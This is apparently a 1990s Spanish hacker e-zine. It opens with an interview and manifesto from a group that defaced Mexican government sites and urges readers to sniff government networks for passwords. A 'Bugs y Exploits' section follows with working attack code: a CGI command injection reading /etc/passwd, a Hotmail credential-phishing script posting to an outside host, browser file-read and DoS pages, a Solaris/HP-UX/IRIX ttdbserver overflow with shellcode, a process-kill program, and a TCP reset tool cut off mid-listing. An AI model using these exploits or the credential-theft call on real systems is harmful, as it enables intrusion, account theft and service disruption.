-------------------------------------------------------------------
- Hay que estar muy seguro antes de hackear una web del gobierno y, ademas,
reconocer publicamente que lo han hecho. No tienen miedo de que les atrapen?

Claro, creo que todos sin excepcion tenemos miedo de perder nuestra libertad
o algo mas, en cualquier ambito, sin embargo tuvimos que demostrarle al gran
hermano que podiamos gritarle lo que opinabamos sin pensar en las
consecuencias, si pensaramos en las consecuencias su sistema represivo estaria
funcionando.

-------------------------------------------------------------------
- Se comenta que el FBI va detras de ustedes. Que hay de cierto en todo esto?

Si hemos oido algunos rumores, y otros hackers nos lo han comentado, no
estamos seguros de que tan cierto sea, gente que conocemos en otras esferas
nos han manifestado que tambien la secretaria de gobernacion inicio algo al
respecto, de nuevo lo ignoramos, pero eso no nos detendra a seguir haciendo
escuchar nuestra voz.

-------------------------------------------------------------------
- Van a seguir hackeando webs del gobierno mexicano? hasta cuando?

Vamos a seguir luchando contra el gobierno, sea hackeando webs o con otras
acciones, lo que principalmente buscamos con estos hacks fue despertar a los
hackers mexicanos que andan por ahi, para unir esfuerzos en una causa comun, y
que el gobierno se diera cuenta que ahi estabamos y ahi estaremos, hay hackers
tanto dentro como fuera del mismo gobierno, por lo que cada vez seremos mas
fuertes. No nos quedaremos pasivos antes las malas decisiones del gobierno,
que solo enriquecen a unos cuantos, basta de mentiras, basta de FOBAPROA,
basta de CABAL PENICHE, basta de LOS SALINAS, basta de ZEDILLO, basta de
ABUSOS!!!

El dia de la independencia vimos que los mexicanos aun respetan sus simbolos
patrios, pero vimos con tristeza y coraje que el gobierno se aprovecha de esa
"sumision" que tenemos como pueblo, creemos que ya fue suficiente de vernos la
cara, narcotrafico en el ejercito, esa institucion yo creo que ya no la
respeta nadie, asi como muchas mas, y sin embargo en la television nos hacen
creer que todo va bien, en cuanto terminara el dolar?, alguien ya lo sabe.

-------------------------------------------------------------------
AQUI TE HACEMOS LLEGAR NUESTRO MANIFIESTO:

"Festejamos la respuesta que ha habido por parte de la gente que nos ha
comunicado su solidaridad y su disposicion para una alianza mexicana por la
libertad de expresion, y contra la negligencia del gobierno. Y reiteramos la
convocatoria para interferir los sistemas gubernamentales y los monopolios,
que nos permitan conocer la VERDAD, no solo lo que les conviene decir, y los
invitamos a que al estar inconformes con el sistema, aquellos que tengan
acceso a informacion confidencial la den a conocer, la divulguen, de manera
anonima si es necesario, pero llegara el dia en que podamos gritar nuestro
desacuerdo sin temor a represalias, porque cada vez seremos mas.

Si tienes acceso a una red del gobierno, corre un sniffer, consigue passwords
y busca lo que el gobierno nos esconde; cuenta con nuestro apoyo, nuestro
e-mail esta a tu disposicion, y daremos a conocer la informacion que nos hagas
llegar, recurre a los medios, nacionales e internacionales, no podran callar
todas nuestras voces.

LA INFORMACION ES PODER, Y EL SABER NOS HACE LIBRES!!!


[X-PLOIT TEAM] - 100% México

x_ploit@hotmail.com

­­ Mexico para los mexicanos e Internet para X-Ploit !!"

-------------------------------------------------------------------


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Bugs y Exploits - PaTa ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Netscape 3.x y 4.x
Objetivo: DoS usando nested tables demtro de etiquetas span
Parche: -
Creditos: Leonid Ksido
Descripcion: Testeado en Communicator 4.05 en Linux Slackware 3.4, y
Navigator 4.05 en Windows 98
Codigo:
<HTML>
<SPAN STYLE="position:absolute; LEFT:0">
<TABLE BORDER="0" WIDTH=100%>
<TR>
<TD>
<TABLE>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
<TABLE>
<TR>
<TD>
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
</SPAN>
</HTML>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: CGI-Script
Objetivo: Ejecutar comandos de forma remota
Parche: Quitar `faxsurvey.orig'
Creditos: Tom <dod@MUENSTER.NET>
Descripcion: Existe un bug en el "faxsurvey" CGI-Script, que permite
ejecutar comandos en el servidor HTTP
Versiones afectadas S.u.S.E. 5.1 y 5.2 Linux.
Codigo: http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Linux RedHat 5.1
Objetivo: DoS
Parche: ftp://ftp.solucorp.qc.ca/pub/linuxconf/devel/redhat-5.1/linuxconf-1.11r19-1.i386.rpm
Creditos: Alex Mottram
Descripcion: Existe un problema de seguridad con linuxconf-1.11.r11-rh3/i386 si lo
actualizas desde el FTP de RedHAT.
Codigo: -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: HOTMAIL
Objetivo: Obtener las claves de los usuarios
Parche: Descativar Java
Creditos: Tom Cervenka
Descripcion: Mediante al ejecucion de un codigo en java malicioso al leer
los mensajes con el navegador que estemos usando, que fuerza
al usuario a volver a registrarse e introducir de nuevo su
cuenta y su contrase¤a, sin saber que en realidad esta mandando
al atacante estos datos.
Codigo:
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508
height=90%>"
+
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\"
color=\"
#ff0000\"><b>Time expired. Please re-login.</b></font><br>"
+
"<font face=\"Arial, Helvetica\" size=\"2\"><a
href=\"
http://www.hotmail.com/errormsg.html\">(Get more info
regarding error messages here)</a></font>"
+
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST
ACTION=\"
http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"
target=\"
_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\"
VALUE=\"
http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail
Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login
Name:</font><br><input type=\"
text\" name=\"login\" size=\"16\"
maxlength=\"
16\"></td><td><font face=\"Arial, Helvetica\"
size=\"
2\">Password:</font><br><input type=\"password\"
name=\"
passwd\" size=\"16\" maxlength=\"16\"> <input
type=\"
submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\"
target=\"
_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16
border=0 alt=\"
Copyright 1996-1997\">";
}

nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}

noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}

</script>
</body>
</html>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Win98
Objetivo: Efecto 2000
Parche: No encender el ordenador en Noche Vieja
Creditos: -
Descripcion: El bug aparece cuando Windows 98 es reiniciado entre las 23:59
y las 00:00 y hace que el ordenador salte uno o dos dias hacia
atras, de pendiendo de la hora exacta de reset. Por ahora esto
solo ocuure el 31 de Diciembre.
Codigo: -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Internet Explorer
Objetivo: Leer ficheros locales
Parche: http://www.microsoft.com/security/bulletins/ms98-013.htm
Creditos: Georgi Guninski
Descripcion: Esta nueva vulnerabilidad permite a una pagian Web dise¤ada
maliciosamente leer archivos de texto o html del ordenador del
usuario y enviar sus contenidos a un host arbitrario, incluso
cuando el usuario se encuentra detras de un firewall. El
agujero explota un error de seguridad en los frames y se basa
en la utilizacion de instrucciones en JavaScript. Para que
funcione se debe conocer de antemano el nombre y camino
completo del fichero que se quiere leer, cosa nomuy dificil.

Versiones afectadas:
- Microsoft Internet Explorer 4.0, 4.01 y 4.01 SP1 sobre
Windows NT 4.0, Windows 95
- Microsoft Windows 98, Internet Explorer iontegrado
(version 4.01 SP1)
- Microsoft Internet Explorer 4.0 y 4.01 para Windows 3.1
y Windows NT 3.51
- Microsoft Internet Explorer 4.0 y 4.01 para Macintosh
- Microsoft Internet Explorer 3.x
Codigo:

<HTML>
<HEAD><TITLE>Read text/HTML file with Internet Explorer
4.01></TITLE></HEAD>
<BODY>
This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other
versions), which allows reading text or HTML file on the user's machine.
<B>Create the file c:\test.txt</B> and its contents are shown in a message
box. The file may be sent to an arbitrary server even if behind a firewall.
<BR>
To test it, you need Javascript enabled.
<BR>
This file is created by <A
HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>

<SCRIPT LANGUAGE="JAVASCRIPT">
alert("This page demonstrates reading the file C:\\test.txt (you may need
to create a short file to view it)"
);
var x=window.open('file://C:/test.txt');
x.navigate("javascript:eval(\"var
a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\"
)
"
);
</SCRIPT>
</BODY>
</HTML>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Linux RedHat 5.1
Objetivo: Matar cualquier proceso
Parche: Nuevo kernel
Creditos: Ryan Dibble <dibbler@umd.umich.edu>
Descripcion: El codigo de abajo puede matar cualquier proceso. No puede matar
init, kflushd, kswapd, ni klogd. Testeado en maquinas con los
siguientes paquetes:
kernel-2.0.34-0.6
glibc-2.0.7-13
glib-1.0.1-2
glibc-debug-2.0.7-13
glibc-devel-2.0.7-13
glibc-profile-2.0.7-13
Codigo:

===== BEGIN shits.c =====
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
int s, p;
if (argc != 2) {
fputs("Please specify a pid to send signal to.\n", stderr);
exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Sending SIGIO - press enter.\n");
getchar();
fcntl(0,F_SETFL,s&~O_ASYNC);
printf("SIGIO send attempted.\n");
return 0;
}
===== END shits.c =====
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Solaris (testeado en SS5 y Ultra 2.5.1), Irix (testeado en r5k
y r10k O2 6.3), HP-UX (testeado en 700s 10.20)
Objetivo: Overflow remoto
Parche: ¨¨???
Creditos: Anonimo
Descripcion: Usar: ./r [-ku] [-p puerto] [-f fichero de salida] host cmd
-k : mata ttdbserver
-u : usar UDP (opr defecto TCP)
-p port : conectar con el ttdbserver en elpuerto
-f outfile : almacena mesaje rpc en un fichero de texto (y no
contacta con el host)
-a : agitar antes de usar
Codigo:

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>

#define PORT 0
#define BSIZE 1024

#if defined(SOLARIS)
# define SP 0xefffd618
# define LENOFS 80
char asmcode[]="\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x92\x03\xe0\x48\x90\x02\x60\x10\xe0\x02\x3f\xf0\xa2\x80\x3f\xff\xa0\x24\x40\x10\xd0\x22\x3f\xf0\xc0\x22\x3f\xfc\xa2\x02\x20\x09\xc0\x2c\x7f\xff\xe2\x22\x3f\xf4\xa2\x04\x60\x03\xc0\x2c\x7f\xff\xe2\x22\x3f\xf8\xa2\x04\x40\x10\xc0\x2c\x7f\xff\x82\x10\x20\x0b\x91\xd0\x20\x08\xff\xff\xff\xfc\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x2e\x2d\x63\x2e";
char NOP[]="\x80\x1c\x40\x11";
#endif

#if defined(HPUX)
# define SP 0x7b03cc10
# define LENOFS 84
char asmcode[]="\xeb\x40\x40\x02\x0b\x39\x02\x80\xd7\x40\x0c\x1e\xb7\x5a\x20\xb8\x0b\x5a\x02\x59\x0f\x21\x10\x98\x97\x18\x07\xff\x0f\x39\x12\x81\x0f\x20\x12\x99\xb7\x39\x20\x10\x0f\x20\x12\x1f\x0f\x59\x12\x89\xb7\x39\x20\x06\x0f\x20\x12\x1f\x0f\x59\x12\x91\x0b\x38\x06\x19\x0f\x20\x12\x1f\xb7\x59\x07\xe1\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x10\x16\x11\x11\x11\x11\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e";
char NOP[]="\x0b\x39\x02\x80";
#endif

#if defined(IRIX)
# define SP 0x7fff1b30
# define LENOFS 76
char asmcode[]="\x04\x10\xff\xff\x27\xe4\x01\x01\x24\x84\xff\x5e\x8c\x8c\xff\xe5\x24\x0d\xff\xff\x01\xac\x60\x23\x01\x84\x60\x20\xa1\x80\xff\xff\xa0\x80\xff\xff\xac\x84\xff\xed\x24\x84\xff\xfd\xa0\x80\xff\xff\xac\x84\xff\xec\x24\x84\xff\xf8\x24\x85\xff\xf0\xac\x84\xff\xf0\xac\x80\xff\xfc\x24\x02\x03\xf3\x02\x04\x8d\x0c\xff\xff\xff\xfc\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e";
char NOP[]="\x24\x0f\x12\x34";

#endif

#define TT_DBSERVER_PROG 100083
#define TT_DBSERVER_VERS 1
#define _TT_P 7

struct tt_reply {
int i1;
int i2;
};

void usage(char *s) {
printf("Usage: %s [-ku] [-p port] [-f outfile] host cmd\n", s);
exit(0);
}

bool_t xdr_tt_reply(XDR *xdrs, struct tt_reply *objp) {

if (!xdr_int(xdrs, &objp->i1))
return (FALSE);
if (!xdr_int(xdrs, &objp->i2))
return (FALSE);
return (TRUE);
}

void make_file(char *fname, char *buf, int type);

main(int argc, char *argv[]) {
extern int optind;
extern char *optarg;
CLIENT *cl;
enum clnt_stat stat;
struct timeval tm;
struct hostent *hp;
struct sockaddr_in target;
struct tt_reply op_res;
char buf[64000], *path, *cmd, *host, *bp, *outfile = NULL;
int sd, i, sp = SP, bsize = BSIZE, port = PORT, kill = 0, proto = 0;

while ((i = getopt(argc, argv, "ukp:f:")) != EOF)
switch (i) {
case 'p':
port = atoi(optarg);
break;
case 'k':
kill = 1;
break;
case 'u':
proto = 1;
break;
case 'f':
outfile = optarg;
break;
default:
usage(argv[0]);
}
if (argc - optind < 2)
usage(argv[0]);
cmd = argv[optind + 1];
host = argv[optind];

for (i = 0; i < sizeof(buf); i++)
*(buf + i) = NOP[i % 4];

i = bsize - strlen(asmcode) - strlen(cmd);
i &= 0xfffffffc;
strcpy(buf + i, asmcode);
strcat(buf, cmd);
*(int *)(buf + i + LENOFS) = ~(strlen(cmd) + 1);
buf[strlen(buf)] = '.';
bp = buf + bsize;
for (i = 0; i < 16; bp+=4, i++)
*(int *)bp = sp;
#ifdef IRIX
sp = sp + 400 + 31652;
for (i = 0; i < 5000; bp+=4, i++)
*(int *)bp = sp;
*bp++ = '/';
*bp++ = 'f';
path = buf + 2;
#else
path = buf;
#endif
*bp = 0;

if (outfile) {
make_file(outfile, buf, proto);
printf("rpc datagram stored in %s\n", outfile);
exit(0);
}

if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL) {
printf("%s: cannot resolve\n", host);
exit(1);
} else
target.sin_addr.s_addr = *(u_long *)hp->h_addr;
}
target.sin_family = AF_INET;
target.sin_port = htons(port);
sd = RPC_ANYSOCK;

tm.tv_sec = 4;
tm.tv_usec = 0;
if (proto)
cl = clntudp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, tm, &sd);
else
cl = clnttcp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, &sd, 0, 0);
if (cl == NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
tm.tv_sec = 10;

if (kill) {
path = NULL;
bp = NULL;
if ((stat = clnt_call(cl, 15, xdr_wrapstring, (char *)&path,
xdr_wrapstring, (char *)&bp, tm)) != RPC_SUCCESS) {
clnt_perror(cl, "clnt_call");
exit(1);
}
printf("Could not kill ttdbserver, reply is: %s\n", bp);
exit(1);
}

if ((stat = clnt_call(cl, _TT_P, xdr_wrapstring, (char *)&path, xdr_tt_reply,
(char *)&op_res, tm)) != RPC_SUCCESS) {
clnt_perror(cl, "clnt_call");
exit(1);
}
printf("res i1 %d, res i2 %d\n", op_res.i1, op_res.i2);
clnt_destroy(cl);
}

void make_file(char *fname, char *buf, int type) {
int fd, offs;
XDR xdrm;
struct rpc_msg rpc_hdr;
struct authunix_parms aup;
char dgram[64000], rauth[MAX_AUTH_BYTES];

if (type == 1) /* UDP */
offs = 4;
if ((fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0666)) == -1) {
perror(fname);
exit(1);
}
xdrmem_create(&xdrm, rauth, sizeof(rauth), XDR_ENCODE);
aup.aup_time = (u_long)time(NULL);
aup.aup_machname = "localhost";
aup.aup_uid = 0;
aup.aup_gid = 0;
aup.aup_len = 0;
aup.aup_gids = NULL;
if (xdr_authunix_parms(&xdrm, &aup) == FALSE) {
printf("error encoding auth cred\n");
exit(1);
}
rpc_hdr.rm_call.cb_cred.oa_length = xdr_getpos(&xdrm);
xdr_destroy(&xdrm);
xdrmem_create(&xdrm, dgram + 4, sizeof(dgram), XDR_ENCODE);
rpc_hdr.rm_xid = 0x12345678;
rpc_hdr.rm_direction = CALL;
rpc_hdr.rm_call.cb_rpcvers = 2;
rpc_hdr.rm_call.cb_prog = TT_DBSERVER_PROG;
rpc_hdr.rm_call.cb_vers = TT_DBSERVER_VERS;
rpc_hdr.rm_call.cb_proc = _TT_P;
rpc_hdr.rm_call.cb_cred.oa_flavor = AUTH_UNIX;
rpc_hdr.rm_call.cb_cred.oa_base = rauth;
rpc_hdr.rm_call.cb_verf.oa_flavor = AUTH_NONE;
rpc_hdr.rm_call.cb_verf.oa_base = NULL;
rpc_hdr.rm_call.cb_verf.oa_length = 0;
if (xdr_callmsg(&xdrm, &rpc_hdr) == FALSE) {
printf("error encoding rpc header\n");
exit(1);
}
if (xdr_wrapstring(&xdrm, &buf) == FALSE) {
printf("error encoding rpc data\n");
exit(1);
}
/* record marking */
*(u_int *)dgram = 0x80000000 | xdr_getpos(&xdrm);
if (write(fd, dgram + offs, xdr_getpos(&xdrm) + 4) == -1) {
perror("write");
exit(1);
}
xdr_destroy(&xdrm);
close(fd);
}
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Win 95, Win/NT
Objetivo: Resetear conexiones TCP/IP
Parche: "Thanks, we'll look into it" (Palabras de Microsoft cuando le
comunicaron el bug).
Creditos: Basement Research <br@DEEPTHOUGHT.EE.SIUE.EDU>
Descripcion: Conociendo la IP de la victima y el puerto TCP, se puede aprove-
char de un fallo en la implementacion del protocolo TCP/IP por
parte de Microsoft, resetear esta conexion.
Codigo:
/* brkill.c
* by the basement research, llp
* Sat Sep 5 04:01:11 CDT 1998
* For the details of how this works, you can visit http://deep.ee.siue.edu/br.
* To compile:
* cc -O2 -o brkill brkill.c -lpcap
*/


#define SWAP(a,b) { a^=b; b^=a; a^=b; }
#define _BSD_SOURCE 1
#ifdef __FreeBSD__
#define BSDFIX(a) (a)
#else
#define BSDFIX(a) htons(a)
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/utsname.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include "pcap.h"

#define TIMEOUT_VALUE 500
#define VICTIM_START_PORT 1023

struct evilpkt
{
struct ip iphdr;
struct tcphdr tcphead;
}
pkt;

struct fakehdr
{
u_long saddr;
u_long daddr;
u_char zero;
u_char proto;
u_short len;
struct tcphdr faketcp;
}
pseudo;

static pcap_t *pfd;
u_long victim;
u_short port;
char *device = NULL;
u_short link_offset = 14;
static char *filter_str;
struct pcap_pkthdr hdr;

u_short
tcp_cksum (u_short * tcphdr, int len)
{
register long sum = 0;
u_short *w = tcphdr;
static u_short answer = 0;

while (len > 1)
{
sum += *w++;
len -= 2;
}
if (len == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (~sum);
}

void
start_pcap ()
{
char cmd[200];
int psize ;
struct bpf_program fcode;
u_int localnet, netmask;
char errbuf[PCAP_ERRBUF_SIZE];
char dialup[] = "ppp0";
psize = 300;


if (device == NULL)
{
if ((device = pcap_lookupdev (errbuf)) == NULL)
{
printf ("pcap_lookupdev : %s\n", errbuf);
exit (-1);
}
}
printf ("Selected network device: %s\n", device);
if (!strcmp (device, dialup))
{
link_offset = 0;
}
if ((pfd = pcap_open_live (device, psize, IFF_PROMISC, TIMEOUT_VALUE, errbuf))
== NULL)
{
printf ("pcap_open_live : %s\n", errbuf);
exit (-1);
}
if (pcap_lookupnet (device, &localnet, &netmask, errbuf) < 0)
{
printf ("pcap_lookupnet : %s\n", errbuf);
exit (-1);
}
snprintf (cmd, sizeof (cmd), filter_str);
printf ("Setting filter : %s\n", filter_str);
if (pcap_compile (pfd, &fcode, cmd, IFF_PROMISC, netmask) < 0)
{
printf ("pcap_compile : %s\n", pcap_geterr (pfd));
exit (-1);
}
if (pcap_setfilter (pfd, &fcode) < 0)
{
printf ("pcap_setfilter : %s\n", pcap_geterr (pfd));
exit (-1);
}
if (pcap_datalink (pfd) < 0)
{
printf ("pcap_datalink : %s\n", pcap_geterr (pfd));
exit (-1);
}
}

u_long
extract_ack (char *pkt)
{
u_long extracted;
u_long last_ack = 0;

bcopy ((u_long *) (pkt + 28), &extracted, sizeof (u_long));
last_ack = ntohl (extracted);
if (last_ack == 0)
{
puts ("This machine returns a last ACK of 0. Cannot reset.");
exit (-1);
}
printf ("Last ACK # sent by the victim is %lu (%#lx).\n", last_ack, last_ack);
return (last_ack);
}

u_long
grab_pcap ()
{
char *pptr = NULL;
u_long last_ack;

while ((pptr = (char *) pcap_next (pfd, &hdr)) == NULL);
pptr = pptr + link_offset;
last_ack = extract_ack (pptr);
return (last_ack);
}

void
init_pkt (u_long dest, u_long src, u_short port)
{
size_t pktlen;

pktlen = sizeof (struct ip) + sizeof (struct tcphdr);
bzero (&pkt, 40);
bzero (&pseudo, 32);
pkt.iphdr.ip_hl = 0x5;
pkt.iphdr.ip_v = IPVERSION;
pkt.iphdr.ip_tos = 0x0;
pkt.iphdr.ip_len = pktlen;
pkt.iphdr.ip_id = htons (0x29a + (u_short) rand () % 7000);
pkt.iphdr.ip_off = BSDFIX (IP_DF);
pkt.iphdr.ip_ttl = 255;
pkt.iphdr.ip_p = IPPROTO_TCP;
pkt.iphdr.ip_src.s_addr = src;
pkt.iphdr.ip_dst.s_addr = dest;
pkt.iphdr.ip_sum = htons (tcp_cksum ((u_short *) & pkt.iphdr, 20));
pkt.tcphead.th_sport = htons (rand () % 5000 + 1024);
pkt.tcphead.th_dport = htons (port);
pkt.tcphead.th_seq = 0;
pkt.tcphead.th_ack = 0;
pkt.tcphead.th_x2 = 0;
pkt.tcphead.th_off = 0x5;
pkt.tcphead.th_flags = TH_ACK + TH_PUSH; /* Use user-supplied argument */
pkt.tcphead.th_win = htons (0x800);
pkt.tcphead.th_urp = 0;
/* Now init the pseudoheader we need to calculate the TCP checksum */
pseudo.saddr = src;
pseudo.daddr = dest;
pseudo.zero = 0;
pseudo.proto = IPPROTO_TCP;
pseudo.len = htons (0x14); /* Refers to ONLY the TCP header plus any options */
bcopy (&pkt.tcphead, &pseudo.faketcp, 20);
pkt.tcphead.th_sum = tcp_cksum ((u_short *) & pseudo, 32);
}

int
open_sock ()
/* Open up a socket and return the resulting file descriptor. */
{
int sockfd;
const int bs = 1;

if ((sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
{
perror ("open_sock():socket()");
exit (-1);
}
if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, (char *) &bs, sizeof (bs)) < 0)
{
perror ("open_sock():setsockopt()");
close (sockfd);
exit (-1);
}
return (sockfd);
}

struct sockaddr_in *
set_sockaddr (u_long daddr, u_short port)
/* Set up target socket address and return pointer to sockaddr_in structure. */
{
struct sockaddr_in *dest_sockaddr;
dest_sockaddr = (struct sockaddr_in *) malloc (sizeof (struct sockaddr_in));

bzero (dest_sockaddr, sizeof (struct sockaddr_in));
dest_sockaddr->sin_family = AF_INET;
dest_sockaddr->sin_port = htons (port);
dest_sockaddr->sin_addr.s_addr = daddr;
return (dest_sockaddr);
}

u_long
host_to_ip (char *host_name)
{
struct hostent *target;
u_long *resolved_ip;
resolved_ip = (u_long *) malloc (sizeof (u_long));

if ((target = gethostbyname (host_name)) == NULL)
{
fprintf (stderr, "host_to_ip: %d\n", h_errno);
exit (-1);
}
else
{
bcopy (target->h_addr, resolved_ip, sizeof (struct in_addr));
return ((u_long) * resolved_ip);
}
}

char *
set_filter (char *destip, char *srcip, char *dport)
{
static char *filt;

filt = (char *) malloc (strlen (destip) + strlen (srcip) + strlen (dport) + 39);
filt[0] = '\0';
strcat (filt, "src host ");
strcat (filt, destip);
strcat (filt, " and dst host ");
strcat (filt, srcip);
strcat (filt, " and src port ");
strcat (filt, dport);
return (filt);
}

u_long
get_ack (u_long victim, u_long saddr, u_short port, int fd, struct sockaddr_in * sock, int delay)
{
size_t psize;
u_long last_ack;

psize = sizeof (struct evilpkt);
init_pkt (victim, saddr, port);
sleep (delay);
if (sendto (fd, (const void *) &pkt, psize, 0, (const struct sockaddr *) sock, sizeof (struct sockaddr)) < 0)
{
perror ("sendto()");
close (fd);
exit (-1);
}
last_ack = grab_pcap ();
return (last_ack);
}

void
usage ()
{
puts ("brkill - by basement research, 9/30/98\n");
puts ("Usage: brkill [-d device] [-s source IP addr]");
puts ("\t [-t time to pause between get_acks (default=1 sec)]");
puts ("\t [-l server low port or single port if not using range (default=6660)]");
puts ("\t [-h server high port or single port if not using range (default=6670)]");
puts ("\t [-v # of victim ports to target (starting at 1023, default=50)]");
puts ("\t [-n # of times to increment seq # by 1 for each port combo (default=0)]");
puts ("\t <victim addr> <victim's server> <dest port for ack retrieval>");
exit (0);
}

int
main (int argc, char **argv)
{
int fd, i, sp, opt, delay = 1, vichighport, vicports = 50, highseq = 0;
u_short ircport, slowport = 0, shighport = 0;
char *source = NULL;
struct sockaddr_in *sock;
u_long saddr, server;
size_t psize;
register u_long last_ack;
struct hostent *hptr;
struct utsname localname;

if ((argc > 18) || (argc < 4))
{
usage ();
}

while ((opt = getopt (argc, argv, "d:s:t:l:h:v:n:")) != -1)
{
switch (opt)
{
case 'd':
device = optarg;
break;
case 's':
source = optarg;
saddr = host_to_ip (source);
break;
case 'p':
delay = atoi (optarg);
break;
case 'l':
slowport = atoi (optarg);
break;
case 'h':
shighport = atoi (optarg);
break;
case 'v':
vicports = atoi (optarg);
break;
case 'n':
highseq = atoi (optarg);
break;
case '?':
puts ("Unknown option.");
exit (-1);
}
}

/* Try to determine source IP address if its not provided */
if (source == NULL)
{
if (uname (&localname) < 0)
{
perror ("uname(): ");
exit (-1);
}
if ((hptr = gethostbyname (localname.nodename)) == NULL)
{
perror ("gethostbyname(): ");
exit (-1);
}
source = hptr->h_name;
bcopy (hptr->h_addr, &saddr, sizeof (struct in_addr));
printf ("Using a source address of %s\n", inet_ntoa (saddr));
}

/* These next two if conditionals deal with the situation where only -l or
* -h are specified. In these cases, we will only target the specified port.
*/

if ((slowport > 0) && (shighport == 0))
{
shighport = slowport;
}
if ((shighport > 0) && (slowport == 0))
{
slowport = shighport;
}

/* If the low server port is bigger than the high server port, then the user
* doesn't know what they are doing. In this case, we'll swap the values.
*/

if (slowport > shighport)
{
SWAP (slowport, shighport);
puts ("Warning: low port is greater than high port - swapping the two...");
}

